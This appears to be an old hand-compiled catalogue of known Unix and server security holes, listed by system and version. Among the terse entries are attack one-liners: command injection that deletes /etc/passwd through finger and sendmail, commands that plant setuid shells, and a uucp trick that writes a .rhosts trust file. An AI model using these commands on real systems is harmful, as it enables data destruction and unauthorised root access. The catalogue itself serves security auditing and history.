KNOWN HOLES AND BUGS IN SERVER SYSTEMS

Operating System RVP Date Description (References)

================ === ======== ================================================

/bin/sh 1-- 12/12/94 IFS hole, vi ()

/bin/su 1-- overwrite stack somehow? ()

/dev/fb 1-- frame buffer devices readable/writeable, ()

/dev/kmem 1-- /dev/kmem should not be o+w ()

/dev/mem 1-- /dev/mem should not be o+w ()

/dev/*st*, *mt* 1-- generally world readable/writeable ()

/etc 1-- rexd + MACH ? [NeXT] /etc/ g+w daemon ()

4.3 Tahoe 1-- chfn -- allows newlines/meta chars/bufsize ()

4.3 Tahoe 1-- ttyA&B;A:cat<ttyB;^Z;B:exit;login;A:&;B:pw/uid;A:got pw ()

AIX ? 5++ setenv SHELL=/bin/sh; crontab -e; :!/bin/sh ()

AIX 2.2.1 1-- shadow password file o+w ()

AIX 3.1.5 5-- sendmail- mail to programs ()

AIX 3.2 5-- sendmail- mail to programs ()

AIX 3.2.4 5-- sendmail- mail to programs ()

AIX 3.2.5 5-- sendmail- mail to programs ()

AIX ? 1-- * password means use root's password? ()

AIX ? 1-- rexd- any can get root access if enabled ()

Amdahl UTS 2.0 1-- NFS mountd only uses hostname ()

AT&T SVR3.2.0 1-- Bad protected mode allows root if have sh + cc ()

A/UX 2.0.1 5-- lpr -s; 1000 calls lpr re-use fname ()

A/UX 2.0.1 5-- rdist(1) uses popen(3), IFS spoof ()

A/UX 2.0.1 5-- rdist(1) uses popen(3), IFS spoof ()

BellTech SYSV386 1-- ulimit 0; passwd ==> zeroes out passwd file ()

BSD 4.1 1-- Sendmail can mail directly to a file

BSD 4.1 1-- can mail directly to a file

BSD 4.1 1-- run set gid program, dump core, is set gid

BSD 4.1 1-- lock- compiled password "hasta la vista", + ^Z ()

BSD <4.2? 1-- IFS w. preserve bug in vi ()

BSD 4.1 1-- mail directly to a file ()

BSD 4.1 1-- exec sgid program, dump core, core is sgid ()

BSD 4.1 1-- Sendmail: can mail directly to a file ()

BSD 4.1 1-- lock password "hasta la vista" backdoor ()

BSD <4.2 1-- IFS w/ preserve bug w/vi ()

BSD <4.2 1-- suspend mkdir, ln file you want to dir ()

BSD <4.2? 1-- suspend mkdir, ln file you want to dir ()

BSD 4.2 1-- lock -- compiled in password "hasta la vista" ()

BSD 4.2 1-- ln passwd file to mail spool, mail to file ()

BSD 4.2 1-- can truncate read only files ()

BSD 4.2 1-- finger "string|/bin/rm -f /etc/passwd"@foo.bar ()

BSD 4.2 1-- ln -s target ~/.plan; finger user to read file ()

BSD 4.2 1-- lpr file; rm file; ln -s /any/filename file ()

BSD 4.2 1-- adb su; change check in memory; shell out ()

BSD 4.2 1-- race condition, can get root via "at" ()

BSD 4.2 1-- lock -- compiled in password "hasta la vista"

BSD 4.2 1-- ln passwd file to mail spool, mail user ()

BSD 4.2 1-- can truncate read only files ()

BSD 4.2 1-- finger "string|/bin/rm -f /etc/passwd"@foo.bar ()

BSD 4.2 1-- ln -s target ~/.plan; finger user. ()

BSD 4.2 1-- lpr file; rm file; ln -s /any/filename file ()

BSD 4.2 1-- adb su; change check in memory; shell out; su ()

BSD 4.2 1-- race condition, can get root via "at" ()

BSD 4.2 1-- /dev/kmem and /dev/mem should not be o+w ()

BSD 4.2 1-- signal any process by changing process group ()

BSD 4.3 1-- ftp -n; quote user ftp; etc. Gets root privs. ()

BSD 4.3 1-- lpd can overwrite file ()

BSD 4.3 1-- ln -s /any/suid/file -i ; -i Get suid shell. ()

BSD 4.3 1-- fchown (2) can chown _any_ file ()

BSD 4.3 1-- race condition, get root via "at" ()

BSD 4.3 1-- passwd chokes on long lines, splits pw file ()

BSD 4.3 1-- ftp -n; quote user ftp; cd ~root, get root ()

BSD 4.3 1-- lpd can overwrite file ()

BSD 4.3 1-- ln -s /any/suid/file -i ; -i Get suid shell ()

BSD 4.3 1-- fchown (2) can chown _any_ file ()

BSD 4.3 1-- race condition (expreserve?), root via "at" ()

BSD 4.3 1-- passwd chokes on long lines, splits pw file ()

BSD 4.3 5-- lpr -s; 1000 calls lpr re-use fname ()

BSD NET/2 5-- rdist(1) uses popen(3), IFS spoof ()

BSD NET/2 5-- lpr -s; 1000 calls lpr re-use fname ()

BSD ? 1-- Overwrite gets buffer -- fingerd, etc

BSD ? 1-- uudecode alias can overwrite root/daemon files ()

BSD ? 1-- /bin/mail ; !/bin/sh Get uid=bin shell ()

BSD ? 1-- rwall bug ()

BSD ? 1-- adb the running kernel, shell out and get root ()

BSD ? 1-- sendmail can mail non-root file, try twice ()

BSD ? 1-- rshd -- spoof via nameservice, rsh target -l uid

BSD386 1-- mail"<u>;cp /bin/sh /tmp;chmod 6777 /tmp/sh" ()

buffer overrun 1-- chfn ()

chfn, chsh 1-- used to create a root account ()

chmod 1-- Incorrect file or directory permissions ()

comsat 1-- running as root, utmp o+w, writes to files ()

core 1-- will system dump a setgid core image? ()

decode 1-- decode mail alias - write non-root user files ()

DellSVR3.2/1.0.6 1-- Bad prot mode allows root if have sh + cc ()

denial 1-- easy to hog processor, memory, disc, tty, etc ()

DomainO/S <=10.3 1-- break root by using s/rbak; sgid/suid ()

DomainO/S <=10.4 5-- sendmail mail to programs ()

DNS 1-- SOA can control bogus reverse ip, rhosts ()

Domain/OS <10.3 1-- break root by using s/rbak; setgid/uid ()

DYNIX 3.0.14 1-- Sendmail -C file ==> displays any file. ()

DYNIX 3.? 1-- can get root on NFS host via root via mountd ()

DYNIX 3.? 1-- on non-trusted host due to bug in mount daemon ()

DYNIX ? 1-- rsh <host> -l "" <command> runs as root ()

DYNIX ? 1-- login: -r hostname

ruser^@luser^@term^@ ()

elm 5-- ELM's autoreply can be used to get root ()

expreserve 1-- can be a huge hole ()

ESIX Rev. D 1-- Bad protected mode allows root if sh+cc ()

file mod test 1-- test file doesn't lose the suid when modified ()

fsck 1-- lost+found should be mode 700 ()

ftpd 1-- static passwd struct overwrite, wuftp < x.xx ()

ftpd 4.2 1-- userid not reset properly, "user root" ()

ftpd ? 1-- core files may contain password info ()

fchown 1-- test for bad group test ()

ftruncate 1-- can be used to change major/minor on devices ()

fingerd 1-- .plan hard-links - read files, fingerd ()

gopher 6-- Type=8 Name=shell Host=;/bin/sh Port= Path= ()

gnuemacs 1-- emacsclient/server allows access to files. ()

GN <1.19 4+- exec0::/path/prog?var=blah%0Ahack-coomands0%A ()

HDB 1-- nostrangers shell escape ()

HDB 1-- changing the owner of set uid/gid files ()

HDB 1-- meta escapes on the X command line ()

HDB 1-- ; breaks on the X line ()

hosts.equiv 1-- default + entry ()

hosts.equiv 1-- easy to spoof by bad SOA at remote site ()

HPUX <7.0 1-- chfn -- allows newlines, etc ()

HP-UX 1-- sendmail: mail directly to programs ()

HPUX A.09.01 1-- sendmail: mail directly to programs ()

HPUX ? 1-- Sendmail: versions 1.2&13.1 sm, -oQ > ()

IDA 1.4.4.1 1-- :include:/some/unreadable/file in ~/.forward ()

ICMP 4-- various icmp attacks possible ()

ICMP 1-- ICMP redirect packets change non-static routes ()

Interactive 2.x 1-- Bad protected mode allows root if sh+cc ()

IRIX 3.3 1-- any user can read any other user's mail. ()

IRIX 3.3.1 1-- any user can read any other user's mail. ()

IRIX 3.3/3.31 1-- sendmail- any user can read other user's mail ()

IRIX 4.0.X 1-- default suid scripts ()

IRIX 4.0.X 1-- various $PATH problems ()

IRIX 4.0.X 1-- sendmail race condition hole ()

IRIX 4.0.X 1-- lpd are vulnerable too ()

IRIX ? 1-- rsh <host> -l "" <command> runs as root ()

IRIX ? 1-- login: -r hostname

ruser^@luser^@term^@ ()

IRIX ? 1-- login: -r hostname

ruser^@luser^@term^@ ()

IRIX ? 1-- Overwrite gets buffer -- fingerd, etc ()

IRIX ? 1-- uudecode alias can overwrite root/daemon files ()

IRIX ? 1-- /bin/mail ; !/bin/sh Get uid=bin shell ()

IRIX ? 1-- rwall bug ()

IRIX ? 1-- adb the running kernel, shell out and get root ()

IRIX ? 1-- mail to any non-root owned file, try twice ()

IRIX ? 1-- rshd- spoof via dns - rsh target -l uid ()

IRIX ? 1-- xwsh log hole? (yo)

kernel 1-- Race conditions coupled with suid programs ()

lock 1-- 4.1bsd version had password "hasta la vista" ()

lost+found 1-- lost+found should be mode 700 ()

lpd 1-- overwrite files with root authority ()

lpr 1-- lpr -r access testing problem ()

lpr 5-- lpr -s; 1000 calls lpr re-use fname ()

lprm 1-- trusts utmp ()

mount 1-- "mount" should not be +x for users. ()

mqueue 1-- must not be mode 777! ()

movemail 1-- worm? ()

Microport 3.0 1-- ulimit 0; passwd ==> zeroes out passwd file ()

network 1-- BSD network security based on "reserved ports" ()

news 1-- news receivers may execute shell commands ()

network 1-- kerberos ()

network 1-- Networks are usually very insecure. ()

NFS 1-- Many systems can be compromised with NFS/RPC. ()

NFS 1-- proxy rpc can read remote nfs files ()

NFS 1-- can generate NFS file handles ()

OSF/1 1.2 1-- write allows shell outs to gain egid term ()

OSF/1 1.3 1-- write allows shell outs to gain egid term ()

OSF/1 1.2 1-- doesn't close the fd to the term writing to ()

OSF/1 1.3 1-- doesn't close the fd to the term writing to ()

passwd 1-- fgets allows entries mangled into ::0:0::: ()

passwd 1-- fred:...:...:...:Fred ....Flintstone::/bin/sh ()

passwd 1-- IDs shouldn't contain: ;~!` M- spoof popen ()

portmap 1-- binding problems... ()

root 1-- ? (fingerd_test.sh)

rcp 1-- nobody problem ()

rexd 1-- existence ()

rexd 1-- MACH ? [NeXT] /etc/ g+w daemon ()

rdist 1-- buffer overflow ()

rdist 5-- rdist(1) uses popen(3), IFS spoof ()

RISC/os 4.51? 1-- rsh <host> -l "" <command> runs as root ()

RPC 1-- Many systems can be compromised with NFS/RPC. ()

rwall 1-- running as root, utmp o+w , writes to files ()

SCO 3.2v4.2 5-- rdist(1) uses popen(3), IFS spoof ()

SCO ? 1-- rlogin to any acct to trusted host w/o pwd ()

SCO ? 1-- rlogin to any acct from trusted host w/o pwd ()

selection_svc 1-- allowed remote access to files ()

sendmail <x.x 1-- -bt -C/usr/spool/mail/user - reads file ()

sendmail <5.57 1-- from:<"|/bin/rm /etc/passwd"> && bounce mail ()

sendmail <=5.61 1-- can mail to any file not root owned, try twice ()

sendmail <5.61 1-- sendmail- groups incorrectly, get group ()

sendmail >5.65 1-- can get daemon privileges via .forward. ()

sendmail ? 5++ can mail to programs (sendmal1, nmh, smail)

sendmail ? 1-- debug option ()

sendmail ? 1-- wizard mode ()

sendmail ? 1-- TURN command allows mail to be stolen ()

sendmail ? 1-- decode mail alias - write non-root user files ()

sendmail ? 1-- buffer overflow causes sendmail daemon lock up ()

sendmail ? 1-- what uid does |program run with? ()

SIGNALS 1-- signal any process by changing process group ()

Stellix 2.0? 1-- rsh <host> -l "" <command> runs as root ()

Stellix 2.0 1-- rsh <host> -l "" <command> runs as root ()

Stellix 2.1 1-- login: -r hostname

ruser^@luser^@term^@ ()

suid 1-- will run .profile if linked to - , IFS ()

suid 1-- never call system(3) and popen(3) ()

suid 1-- May not expect filesize signals, SIGALRMs ()

suid 1-- no setuid program on a mountable disk ()

suid 1-- ro mounting of foreign disk may allow suid. ()

suid 1-- .plan links ()

suid 1-- /usr/ucb/mail ~!cp /bin/sh /tmp/sh; chmod 2555 /tmp/sh ()

SunOS 3.3 1-- ftpd - userid not reset properly, "user root" ()

SunOS 3.5 1-- connect w/acct;user root;ls;put /tmp/f/ tmp/b ()

SunOS <4.0 1-- any user can run yp server ()

SunOS 4.0 1-- chsh -- similar to chfn ()

SunOS 386i 1-- rm logintool, hack login with adb, chmod 2750 ()

SunOS 386i/4.01? 1-- login -n root requires no password ()

SunOS 386i/4.01? 1-- login -n root (no password) ()

SunOS 4.0.1 1-- chfn buffer problems ()

SunOS 4.0.1 1-- chsh buffer problems ()

SunOS 4.0.1 1-- ypbind/ypserv, SunOS 4.0.1; need 3 machines ()

SunOS 4.0.3 1-- ypbind/ypserv, SunOS 4.0.1; need 3 machines ()

SunOS 4.0.3 1-- concurrent yppasswd sessions can trash yp map ()

SunOS 4.0.3 1-- mail to any non-root owned file, try twice ()

SunOS 4.0.3 1-- rcp buffer overflow ()

SunOS 4.0.3 1-- sendmail- mail to non-root file, try twice ()

SunOS 4.0.3 1-- ttyA&B;A:cat<ttyB;^Z;B:exit;login;A:&;B:pw/uid;A:gets PW ()

SunOS 4.0.3 1-- uucico can show ph num, login, passwd, on remote machine ()

SunOS 4.0.3 1-- ypserv sends maps to anyone w/ domain (ypsnarf)

SunOS 4.0.? 1-- anyone can restore a file over any other file. ()

SunOS 4.0.? 1-- chfn -- allows newlines, meta chars, bufsize problem. ()

SunOS 4.0.? 1-- rcp with uid -2; only from PC/NFS. ()

SunOS 4.0.? 1-- ln -s /any/suid/file -i ; -i ()

SunOS 4.0.? 1-- selection_svc can remotely grab files. ()

SunOS 4.1 1-- rshd: spoof via nameservice, rsh target -l uid ()

SunOS 4.1 1-- shared libs accept relative paths w/ suid ()

SunOS 4.1 1-- sendmail: groups incorrectly checked, can get any group ()

SunOS 4.1 1-- comsat can overwrite any file ()

SunOS 4.1.x 1-- comsat can overwrite any file ()

SunOS 4.1.x 1-- ptrace allows to become root ()

SunOS 4.1.x 1-- openlook: telnet 2000; executive,x3, run ps int ()

SunOS <4.1.1 5-- lpr -s; 1000 calls lpr re-use fname ()

SunOS 4.1.2 5-- rdist(1) uses popen(3), IFS spoof ()

SunOS ? 1-- /usr/kvm/crash allows sh escapes group kmem ()

SunOS ? 1-- ttyA&B;A:cat<ttyB;^Z;B:exit;login;A:&;B:pw/uid;A:gets PW()

SunOS ? 1-- /dev/kmem and /dev/mem should not be o+w ()

SunOS ? 1-- rshd -- spoof via nameservice, rsh target -l uid

SunOS ? 1-- ftp -n; quote user ftp; etc. Gets root privs. ()

SunOS ? 1-- symlink .plan to target file, finger user to read. ()

SunOS ? 1-- Overwrite gets buffer -- fingerd, etc. (3.5)

SunOS ? 1-- rwall bug (<= 4.01 yes). ()

SunOS ? 1-- ptrace allows to become root ()

SunOS ? 4-- icmp errors not handled correctly ()

SunOS ? 1-- adb the running kernel, shell out and get root ()

SunOS ? 1-- ftp -n; quote user ftp; etc. Gets root privs ()

SunOS ? 1-- lpd can overwrite file ()

SunOS ? 1-- the window manager can be used to read any file ()

SunOS ? 1-- rexd -- any can get root access if enabled ()

SunOS ? 1-- emacsclient/server allows access to files ()

SunOS ? 1-- openlook; telnet port 2000; executive,x3, runs PS interp

SunOS ? 1-- devinfo can be used to get group kmem ()

SunOS 5.1 1-- Symlinks are broken ()

syslogd 6-- buffer overrun, allows remote access ()

syslogd 1-- syslog messages used to overwrite any file ()

system 1-- system(3) even w/ setuid(getuid()) = IFS ()

SYSV <R4 1-- write to files; race condition w/ mkdir & ln ()

SYSV <R4 1-- expreserve problem/race condition ()

SYSV R? 1-- IFS, other environment at "login:" prompt ()

tcp/ip 1-- sequence number prediction allows spoofing ()

tcp/ip 1-- source routing make host spoofing easier ()

tcp/ip 1-- rip allows one to capture traffic more easily ()

tcp/ip 4-- various icmp attacks possible ()

tftp 1-- puts/gets -- grab files, do chroot ()

traceroute 1-- allow one to easily dump packets onto net ()

ulimit 1-- passwd(1) leaves passwd locked if ulimit set ()

Ultrix 2.0? 1-- sendmail- 1.2&13.1 sm, -oQ > can r/w any ()

Ultrix 2.0? 1-- Sendmail -C file ==> displays any file. ()

Ultrix 2.2? 1-- Sendmail -C file ==> displays any file. ()

Ultrix 2.2 1-- ln passwd file to mail spool, mail to user ()

Ultrix 2.2 1-- on a non-trusted host due to bug in mountd ()

Ultrix 2.2 1-- Sendmail: -C file ==> displays any file ()

Ultrix 2.2 1-- can get root on NFS host via root via mountd ()

Ultrix 2.2 1-- get root on host running NFS from other root ()

Ultrix 3.0 1-- lock -- compiled in password "hasta la vista" ()

Ultrix 3.0 1-- login -P progname allows run programs as root ()

Ultrix 3.0 1-- login can run any program with root privs ()

Ultrix 3.0 1-- ln -s target ~/.plan; finger user to access ()

Ultrix 3.0 1-- any user can mount any filesystem ()

Ultrix 3.0 1-- X11 doesn't clear pwds in mem; /dev/mem is o+w ()

Ultrix <3.1 1-- limit file 0; passwd --> zeroes out passwd file ()

Ultrix <3.1 1-- lpd can overwrite any file (back to 2.0?) ()

Ultrix 3.1? 1-- rshd: spoof via nameservice, rsh target -l uid ()

Ultrix 3.1? 1-- allows newlines, meta chars, bufsize problem ()

Ultrix <4.1 1-- overflow RISC reg buffer, get root w/ mail ()

Ultrix ? 1-- rshd -- spoof via dns, rsh target -l uid ()

Ultrix ? 1-- ypbind takes ypset from all; spoof yp DB ()

Ultrix ? 1-- yppasswd leaves yp data files world writable ()

Ultrix ? 1-- chfn -- allows newlines, meta chars, bufsize ()

Ultrix ? 1-- ftp -n; quote user ftp; etc. Gets root privs ()

Ultrix ? 1-- can change host name, mount any filesystem ()

Ultrix ? 1-- uudecode alias can overwrite root/daemon files ()

Ultrix ? 4-- ICMP not handled correctly (nuke)

Ultrix ? 1-- emacsclient/server allows access to files ()

Ultrix ? 1-- lock: password "hasta la vista" backdoor ()

Ultrix ? 1-- /dev/kmem and /dev/mem should not be o+w ()

Ultrix ? 1-- can change physical ethernet address ()

UNIX 1-- / must not be go+w ()

utmp 1-- etc/utmp o+w ? ()

utmp 1-- check to see if world writeable (rwall, comsat)

utmp 1-- syslog messages can overwrite any file ()

uucp 1-- check valid UUCP akts in the /etc/ftpusers ()

uucp 1-- echo "myhost myname">x;uucp x ~uucp/.rhosts ()

uucp 1-- uucico shows ph num, login, passwd, of remote ()

uudecode 1-- if it is setuid, may create setuid files ()

uusend 1-- uusend may call "uux" while suid to root ()

uux 1-- uusend may call "uux" while suid to root ()

X11R? 1-- snoop on keyboards and bitmaps ()

X11R3 1-- can set log on and exec (fixed in "fix-6")

X11R4 1-- can set log on and exec (fixed in "fix-6")

X11R ? 1-- snoop on keyboards and bitmaps ()

X11R5 5++ xterm can create files (xterm1__)

xhost 1-- if + , anyone can connect to X server ()

ypbind 1-- accepts ypset from anyone ()